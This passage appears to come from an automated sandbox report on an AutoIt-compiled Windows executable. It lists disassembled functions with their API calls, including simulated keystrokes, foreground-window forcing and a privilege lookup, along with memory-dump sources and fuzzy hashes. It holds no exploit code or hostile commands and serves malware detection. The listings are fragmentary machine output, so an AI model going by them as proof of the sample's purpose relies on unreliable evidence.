                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                  • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                  • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                                                                                  • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                  • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                                                                                  Function 00A76086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: e09cf8f158240847f163746c94635338a8ca539da29f0f4cb2d32bb0dd1ac3f6
                                                                                                                                                  • Instruction ID: 9502f8dbdc697bbaecbad273772590a64815e6bf1b2d147f30bec835a0f5f76b
                                                                                                                                                  • Opcode Fuzzy Hash: e09cf8f158240847f163746c94635338a8ca539da29f0f4cb2d32bb0dd1ac3f6
                                                                                                                                                  • Instruction Fuzzy Hash: 1D01B571D0DB409ECB258B348C083767BB46F56310F4DCB9AE08D9B1A3D2708D09CB52
                                                                                                                                                  Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __lock_file.LIBCMT ref: 004248A6
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                                  • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                  • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                                                                                  • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                  • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                                                                                  Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                  • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                  • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                                                                                  • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                  • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                                                                                  Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongNamePath_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2514874351-0
                                                                                                                                                  • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                  • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                                                                                  • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                  • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                                                                                  Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                  • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                  • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                                                                                                                  • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                  • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                                                                                                                  Function 00BF68E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00BF68EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                  • Instruction ID: 7b72b803f5292c56d46f2064076d04e9aa029a7faf929cfaaff9839dd9f4baa9
                                                                                                                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                  • Instruction Fuzzy Hash: 34E08C31A0520CEBCB20CBBC8C08AB973E8DB09320F1086A9EE1AC3280D5718E48A654
                                                                                                                                                  Function 00BF68B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00BF68BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                  • Instruction ID: 6a694922e0432cc202ca835d0ad92e72b6cb5e69f9afba7c403a7db373df0c15
                                                                                                                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                  • Instruction Fuzzy Hash: 27D0A73090520CEBCB10CFB49C049EA73E8DB05360F104799FE15C32C0D6319D489760
                                                                                                                                                  Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wfsopen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                  • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                  • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                                                                                                  Function 00BF82EC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                  • Instruction ID: 57416430b0908a7c007851741c86e5439d47316cb802ac94555ab07efb49f3dc
                                                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                  • Instruction Fuzzy Hash: BAE0BF7494010DEFDB00EFA4D5496EE7BB4EF04701F1005A1FD05D7691DB309E548A66
                                                                                                                                                  Function 00BF82F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                  • Instruction ID: 3acbf4fe4a7b8b0e78eb594e5ae5947ce71c2ca7dcdc9188b7f5db1b61076fb8
                                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                  • Instruction Fuzzy Hash: 54E0E67494010DDFDB00EFB4D5496AE7FF4EF04701F1001A1FD01D2281DA309D508A62

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                                                                                  • SendMessageW.USER32 ref: 0048CC29
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                                                                                  • SendMessageW.USER32 ref: 0048CD33
                                                                                                                                                  • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                                                                                  • SetCapture.USER32(?), ref: 0048CE69
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                                                                                  • ReleaseCapture.USER32 ref: 0048CF00
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                                                                                  • SendMessageW.USER32 ref: 0048CFD1
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                                                                                  • SendMessageW.USER32 ref: 0048D03D
                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                                                                                  • GetParent.USER32(?), ref: 0048D0BA
                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                                                                                  • SendMessageW.USER32 ref: 0048D154
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                                                                                  • SendMessageW.USER32 ref: 0048D22F
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                                                                                    • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                  • String ID: @GUI_DRAGID$F$pbL
                                                                                                                                                  • API String ID: 3977979337-2097280626
                                                                                                                                                  • Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                                                                                  • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                                                                                  • Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                                                                                  • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                                                                                  Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$_memset
                                                                                                                                                  • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                                                                                  • API String ID: 1357608183-1426331590
                                                                                                                                                  • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                  • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                                                                                  • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                  • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                                                                                  Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                                                                                  • IsIconic.USER32(?), ref: 0043D66E
                                                                                                                                                  • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                                  • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                  • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                                                                                  • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                  • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                                                                                  Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
